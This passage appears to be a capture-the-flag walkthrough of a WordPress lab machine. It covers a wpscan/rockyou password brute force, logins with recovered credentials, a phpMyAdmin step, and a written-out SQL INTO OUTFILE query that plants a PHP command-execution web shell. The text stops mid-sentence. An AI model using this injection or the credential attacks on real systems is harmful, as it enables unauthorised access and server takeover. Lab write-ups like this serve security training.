style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Adding users &lt;b&gt;admin&lt;/b&gt;, &lt;b&gt;orange&lt;/b&gt; and &lt;b&gt;lemon&lt;/b&gt; to text&amp;nbsp; file&amp;nbsp;&lt;b&gt;users.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEil2EFFEJiFfDiMuoQAMtp60cMnps9CBq-LUqOobV3MvyUud9imPstOjfbBMHaGM6O3vIA4y8uKMAnDkjp8m9F6aggerGfxvt47hASLtMhtsY3ModZRAzzuIQh9eh3vJwNZqQ1runUiozNzWvLXrgnRlAUsmzodsqnB-8aGGNjkMi0MQ4DXHMIzbvuXEA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;131&quot; data-original-width=&quot;293&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEil2EFFEJiFfDiMuoQAMtp60cMnps9CBq-LUqOobV3MvyUud9imPstOjfbBMHaGM6O3vIA4y8uKMAnDkjp8m9F6aggerGfxvt47hASLtMhtsY3ModZRAzzuIQh9eh3vJwNZqQ1runUiozNzWvLXrgnRlAUsmzodsqnB-8aGGNjkMi0MQ4DXHMIzbvuXEA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Wpscan&lt;/b&gt; and &lt;b&gt;rockyou.txt&lt;/b&gt; find the password &lt;b&gt;ginger&lt;/b&gt; for user &lt;b&gt;orange&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhrM8zX1fTY51mdjPWEChCDvMxoR94rQt7nHUI1r_zKBGvmXuCdZneriCBOQyN8lXUH3T5BeuxjTh5qfTRPeCzWWY8Yk4IL11OUk3E0ZxnX08TnbGEiwBc2rlnBIvvlvp6TVvRvag3gT8uSDJ4wIufKUBWUetmIV8A2ZPXn6J3KNltU8K4xDnHVIlWQjw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;64&quot; data-original-width=&quot;1119&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhrM8zX1fTY51mdjPWEChCDvMxoR94rQt7nHUI1r_zKBGvmXuCdZneriCBOQyN8lXUH3T5BeuxjTh5qfTRPeCzWWY8Yk4IL11OUk3E0ZxnX08TnbGEiwBc2rlnBIvvlvp6TVvRvag3gT8uSDJ4wIufKUBWUetmIV8A2ZPXn6J3KNltU8K4xDnHVIlWQjw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj85CypKdStiQsu3u_aghOB3OReNbr0IbICKfbckp9wCDR2qu0iikoCfIQeGk1lo0p-itzI2UqE9ihw5gX7dEVtlGz9OHJUTiQJrhGZaK6DltdVQ5eoww9C3aWfPoszNXL9lTgAdmK8_Dddo40kv6AmhHfdvWobdS_jWiY0OYvJGZIQUbMQC_9cqgvu4A&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;52&quot; data-original-width=&quot;642&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj85CypKdStiQsu3u_aghOB3OReNbr0IbICKfbckp9wCDR2qu0iikoCfIQeGk1lo0p-itzI2UqE9ihw5gX7dEVtlGz9OHJUTiQJrhGZaK6DltdVQ5eoww9C3aWfPoszNXL9lTgAdmK8_Dddo40kv6AmhHfdvWobdS_jWiY0OYvJGZIQUbMQC_9cqgvu4A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Logging into Wordpress with credentials &lt;b&gt;orange:ginger&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTq7-o-n8JYxW7tj6LwANH0JMeGTWEnVkK1p3ZCa-wf6YXoIoYkXIoXpzzERXkOk5a443WJXsAQdi4372au5fS05JdfE_wkcTrIE3-wme4ueJHsEJ_umuCnL_ZQe5sBLPBKr5Ox0pOcvSPMivGyj6onrmUD3N1OAfY-NNDPiq7jpZyaVRAf4AjbLLm2g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;608&quot; data-original-width=&quot;568&quot; height=&quot;487&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTq7-o-n8JYxW7tj6LwANH0JMeGTWEnVkK1p3ZCa-wf6YXoIoYkXIoXpzzERXkOk5a443WJXsAQdi4372au5fS05JdfE_wkcTrIE3-wme4ueJHsEJ_umuCnL_ZQe5sBLPBKr5Ox0pOcvSPMivGyj6onrmUD3N1OAfY-NNDPiq7jpZyaVRAf4AjbLLm2g=w455-h487&quot; width=&quot;455&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEghV__CbFBnSYsn0cslFc6SeLUSj1gcZ30YA72LeUp5ET5hy8irJ2vsmL_RoXdeBGQIO1X_KyK2rqhOEZ3n9b-vV8lE5ZHr82fcqoIOkLbInuMG63k9LsQKtV8yEKFbF33UJyhYkOmFIwp-lTeVbqVg13MvyAKiclQv8wRyX-1d5Q2xUS7MFsAg0J3sjA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;815&quot; data-original-width=&quot;553&quot; height=&quot;747&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEghV__CbFBnSYsn0cslFc6SeLUSj1gcZ30YA72LeUp5ET5hy8irJ2vsmL_RoXdeBGQIO1X_KyK2rqhOEZ3n9b-vV8lE5ZHr82fcqoIOkLbInuMG63k9LsQKtV8yEKFbF33UJyhYkOmFIwp-lTeVbqVg13MvyAKiclQv8wRyX-1d5Q2xUS7MFsAg0J3sjA=w507-h747&quot; width=&quot;507&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading the post we discover the potential password&amp;nbsp;&lt;b&gt;n0t1n@w0rdl1st!&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh6DHyNGfU4a4Hgi-X_dsbI-uLZFB0aC7X_xFgrQM2LnRPoRjpxcwYWB1o3hkvmeuBsB6Shg2AQBy6t1yVI29UBdu8ZhZYd6kI2Mh7_9D4qsTv99zPb3Lhxud0hKCeQXKoXvM21nXjJBSJrNCbPkFnHl9fn0N-ekakgAZCV3g0AIj_wTYhFedr1O-wfdQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;215&quot; data-original-width=&quot;345&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh6DHyNGfU4a4Hgi-X_dsbI-uLZFB0aC7X_xFgrQM2LnRPoRjpxcwYWB1o3hkvmeuBsB6Shg2AQBy6t1yVI29UBdu8ZhZYd6kI2Mh7_9D4qsTv99zPb3Lhxud0hKCeQXKoXvM21nXjJBSJrNCbPkFnHl9fn0N-ekakgAZCV3g0AIj_wTYhFedr1O-wfdQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh0nQIFHhVMXwxoYwGHkqM_IjxIqQxPQzGHRK5gvxjWqYMxi_VxIX6iNaCA-rikUF2I-r8l54XUB5djrJ7ruSfuKiYwkGNL1YDQZP4wC42lZGF6BLpbXDzUyXaS3LIoPbA1UX6bXMisWnYxFKcE5BcC3mDf9-Ks6VzCdgzrxVDNvtWBlKT7w-XyfV7LaA&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;351&quot; data-original-width=&quot;488&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh0nQIFHhVMXwxoYwGHkqM_IjxIqQxPQzGHRK5gvxjWqYMxi_VxIX6iNaCA-rikUF2I-r8l54XUB5djrJ7ruSfuKiYwkGNL1YDQZP4wC42lZGF6BLpbXDzUyXaS3LIoPbA1UX6bXMisWnYxFKcE5BcC3mDf9-Ks6VzCdgzrxVDNvtWBlKT7w-XyfV7LaA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying &lt;b&gt;phpmyadmin&lt;/b&gt; now with credentials&amp;nbsp;&lt;b&gt;orange:n0t1n@w0rdl1st!:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhC7FDxOwI-joBUjrZov15cs9nuWAUUlGNMH3_vz2wuLWO0nzZHherubeeZuq0tTTISSz6cwKRtdqZoB_puS4Jw5UUTGuPBf71tIC04fxCjzxXNrd5vaFW97CKuZtPGUy6JDpG6bq79xRQbI_mx5DnLb_BxzXN4NyE5ixi_asPyccAc3_u_HveouADUtA&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;670&quot; data-original-width=&quot;522&quot; height=&quot;597&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhC7FDxOwI-joBUjrZov15cs9nuWAUUlGNMH3_vz2wuLWO0nzZHherubeeZuq0tTTISSz6cwKRtdqZoB_puS4Jw5UUTGuPBf71tIC04fxCjzxXNrd5vaFW97CKuZtPGUy6JDpG6bq79xRQbI_mx5DnLb_BxzXN4NyE5ixi_asPyccAc3_u_HveouADUtA=w465-h597&quot; width=&quot;465&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjSQSCXVw3HGTiQWqjdG28R3pMRxkwIHDCd8ZdUAGh9Vv32LqGF-dc4859MycT8MK2z4cYTd76NLFuAmyg86AYmdXKs413PkqCof7pgivptaqHT-v825pGUgzsc6scIQpvnmTgKP580Hoo84r-zpyLq5K-zsxsRacjoA9yG-1sTnUtB1FAZ-xTvu6ZNLQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;815&quot; data-original-width=&quot;778&quot; height=&quot;718&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjSQSCXVw3HGTiQWqjdG28R3pMRxkwIHDCd8ZdUAGh9Vv32LqGF-dc4859MycT8MK2z4cYTd76NLFuAmyg86AYmdXKs413PkqCof7pgivptaqHT-v825pGUgzsc6scIQpvnmTgKP580Hoo84r-zpyLq5K-zsxsRacjoA9yG-1sTnUtB1FAZ-xTvu6ZNLQ=w685-h718&quot; width=&quot;685&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There are 2 encrypted passwords for &lt;b&gt;lemon&lt;/b&gt; and &lt;b&gt;orange&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi0uwr5G_V6_IHGPGQ7Nm9ZnyhMKlKctjRb8ouQNegXbWSJm9ftcGSblm28mo3mmGMbX9VLt1RjDdpEbly1uTGGBc0s94HIt2Bh6nct7KgKqo64xMvSO4ItzjpAzvAWefYYyNrHZK3w8HZqcg6NSCIl_SLFCS-1o1LvLfdSI94xufqHVC6cjoMF9SGzVg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;178&quot; data-original-width=&quot;950&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi0uwr5G_V6_IHGPGQ7Nm9ZnyhMKlKctjRb8ouQNegXbWSJm9ftcGSblm28mo3mmGMbX9VLt1RjDdpEbly1uTGGBc0s94HIt2Bh6nct7KgKqo64xMvSO4ItzjpAzvAWefYYyNrHZK3w8HZqcg6NSCIl_SLFCS-1o1LvLfdSI94xufqHVC6cjoMF9SGzVg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Hash-identifier&lt;/b&gt; identifies the hashes as &lt;b&gt;MD5 (Wordpress)&lt;/b&gt;, however after several trials we were not able to decrypt them:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjkkMQC32aJyKz_qQNABJT0K75EswqpUnZiYnyGrqqRV9LFu51y55Al9oVfgNs1F4IShQ4EeKiGcdujrIhWmFcy2XW4JHnF6rqGBXDSPxfqYTED2cur9AIVVaFzgz3cwQx61TPutwubrf9u6-WhCZ7nXh6hhfFLqiWEwJ3FoODFUbYM1qzKu7Uy3cqLqQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;452&quot; data-original-width=&quot;847&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjkkMQC32aJyKz_qQNABJT0K75EswqpUnZiYnyGrqqRV9LFu51y55Al9oVfgNs1F4IShQ4EeKiGcdujrIhWmFcy2XW4JHnF6rqGBXDSPxfqYTED2cur9AIVVaFzgz3cwQx61TPutwubrf9u6-WhCZ7nXh6hhfFLqiWEwJ3FoODFUbYM1qzKu7Uy3cqLqQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;3 - EXPLOITATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Creating a new table and entering this crafted SQL query we will inject the exploit &lt;b&gt;shell.php&lt;/b&gt;:&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;i&gt;&lt;b&gt;SELECT &quot;&amp;lt;?php system($_GET[&#39;cmd&#39;]); ?&amp;gt;&quot; into outfile &quot;/var/www/html/wordpress/shell.php&quot;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh00g9HeTwBbpIGCigKxZRoldB9r1deXJ05Jvu_OP22eKJUtrSLNr80Eut7hWzk4SMWhF6Mg7I0VLNZ-sCfS1XtqSlhg4mOuTJh6ZTy8zSuX3yDSP9nGts-3jG3vo7ZNF9EwQglLyaPFPyfGV3MkUUm4XlcWoHwCYde8MuFcXI1SAoMMYAl9ZILgPw3wQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;129&quot; data-original-width=&quot;590&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh00g9HeTwBbpIGCigKxZRoldB9r1deXJ05Jvu_OP22eKJUtrSLNr80Eut7hWzk4SMWhF6Mg7I0VLNZ-sCfS1XtqSlhg4mOuTJh6ZTy8zSuX3yDSP9nGts-3jG3vo7ZNF9EwQglLyaPFPyfGV3MkUUm4XlcWoHwCYde8MuFcXI1SAoMMYAl9ZILgPw3wQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgRPL0pNKyGcIUg9Gm4d-ZvpHEGNzUNwart_euaw6Ltshz4kx-hotRXYXkutXIUNh59g9E6JeTyqDveznSsIHerkOpZ13m48nCCnqrzzny8eldOg7siZex_3a1QLPLUyduWP4Sum-tQE8Wkbq6gqzQIgitjPbICBsdQIDmsMxUrEw7EYaOYr3NASFlxSw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;220&quot; data-original-width=&quot;918&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgRPL0pNKyGcIUg9Gm4d-ZvpHEGNzUNwart_euaw6Ltshz4kx-hotRXYXkutXIUNh59g9E6JeTyqDveznSsIHerkOpZ13m48nCCnqrzzny8eldOg7siZex_3a1QLPLUyduWP4Sum-tQE8Wkbq6gqzQIgitjPbICBsdQIDmsMxUrEw7EYaOYr3NASFlxSw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now we are able to perform &lt;b&gt;Remote 